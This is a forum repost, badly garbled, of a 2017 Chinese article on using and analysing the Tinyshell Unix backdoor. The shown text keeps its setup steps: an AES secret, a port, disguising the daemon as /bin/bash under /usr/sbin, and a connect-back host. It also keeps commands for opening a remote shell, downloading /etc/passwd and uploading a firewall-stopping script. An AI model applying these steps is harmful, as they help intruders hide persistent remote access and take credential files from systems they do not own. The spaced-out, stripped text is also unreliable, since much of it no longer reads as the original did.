搜索

[11517] 2017-06-30_短小精干的Unix类后门Tinyshell的使用与分析

文档创建者:s7ckTeam
浏览次数:35
最后更新:2025-01-18
2017-06-30_短小精干的Unix类后门Tinyshell的使用与分析 U n i x T i n y   s h e l l 使   d a p z x b 4 1 6 9 3   F r e e B u f   2 0 1 7 - 0 6 - 3 0 * d a p z x b 4 1 6 9 3 F r e e B u f 0 x 0 0 .   T i n y   S h e l l   U n i x s h e l l C k a l i 5 5 K ) h a c k e r h a c k e r h a c k e r s h e l l < > h t t p s : / / g i t h u b . c o m / o r a n g e t w / t s h 使 0 x 0 1 .   使 使 使 使 I 1 .   t s h . h s e c r e t s e c r e t     A E S
s e c r e t 1 .   t s h . h S E R V E R _ P O R T S E R V E R _ P O R T 1 .   t s h . h F A K E _ P R O C _ N A M E F A K E _ P R O C _ N A M E   / b i n / b a s h ,   p s   - e f n e t s t a t   / b i n / b a s h   , 1 .     / / # d e f i n e   C O N N E C T _ B A C K _ H O S T " 1 0 . 1 . 1 0 0 . 3 " / / # d e f i n e   C O N N E C T _ B A C K _ D E L A Y   3 0
m a k e   l i n u x t s h t s h d I I 1 .   u m a s k s h e l l s h e l l s h e l l 1 .   t s h d   b a s h 使 l s o f   - i : 8 0 8 0     C O M M A N D t s h . h m a k e   l i n u x u m a s k   0 7 7 ;   H O M E = / v a r / t m p m v   t s h d   b a s h
l s o f   - i : 8 0 8 0   C O M M A N D b a s h 1 .     / u s r / s b i n   ( / u s r / s b i n ) / u s r / s b i n   ( b a s h / b i n / b a s h     / u s r / b i n / b a s h ) 使 p w d x   I D   / u s r / s b i n p w d x   / u s r / s b i n   I I I 使 使 1 .   s h e l l   .   I P :   1 0 . 1 . 1 0 0 . 3   k a l i   P I D 1   1 0 . 1 . 1 0 0 . 2 / u s r / s b i n / b a s h
s h e l l t s h d / u s r / s b i n b a s h   O K t s h d / u s r / s b i n / b a s h     t s h . c 2 3 6 b a s h P A T H / u s r / s b i n     / u s r / b i n / b a s h   / b i n / b a s h b a s h   b a s h . / t s h   1 0 . 1 . 1 0 0 . 3 / u s r / l o c a l / j d k 1 . 8 / b i n : / u s r / l o c a l / j d k 1 . 8 / j r e / b i n : / u s r / l o c a l / j d k 1 . 8 / b i n : / u s r / l o c a l / j d k 1 . 8 / j r e / b i n : / u s r / l o c a l / s b i n : / u s r / l o c a l / b i n : / u s r / s b i n : / u s r / b i n : / s b i n : / b i n : / u s r / l o c a l / a p a c h e - a n t - 1 . 1 0 . 1 / b i n : / u s r / l o c a l / g r a d l e / b i n
. / t s h   1 0 . 1 . 1 0 0 . 3
O K 2 .   / e t c / p a s s w d 3 .   使 使 . / t s h   1 0 . 1 . 1 0 0 . 3   g e t   / e t c / p a s s w d   . . / t s h   1 0 . 1 . 1 0 0 . 3   p u t   s t o p _ f w . s h   / t m p
    / / C O N N E C T _ B A C K _ H O S T   I P 1 0 . 1 . 1 0 0 . 3     ( k a l i   ) C O N N E C T _ B A C K _ D E L A Y     ,   w h i l e     1 2 # d e f i n e   C O N N E C T _ B A C K _ H O S T     " 1 0 . 1 . 1 0 0 . 3 " # d e f i n e   C O N N E C T _ B A C K _ D E L A Y   3 0 m a k e   l i n u x . / t s h   c b
c b   t s h d   b a s h / u s r / s b i n / b a s h 3   ( 1 0 . 1 . 1 0 0 . 2   ) P I D 3 0 8 2 3 0 s h e l l   - b a s h   b a s h P I D 3 0 8 2 3 1 4 7 / b i n / b a s h ,   P I D 3 1 4 8 e x e c   / b i n / b a s h   l o g i n   s h e l l s h e l l p i d 3 1 4 7   / u s r / s b i n / b a s h / u s r / s b i n / b a s h
f o r k 退 f o r k i n i t p i d 3 0 4 8 P I D   3 0 4 8 f o r k 2 ( t s h d . c   2 1 1 ) 2   f o r k 3 2 退 3 i n i t 3 0 x 0 2 .   T i n y   s h e l l   * d a p z x b 4 1 6 9 3 F r e e B u f
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理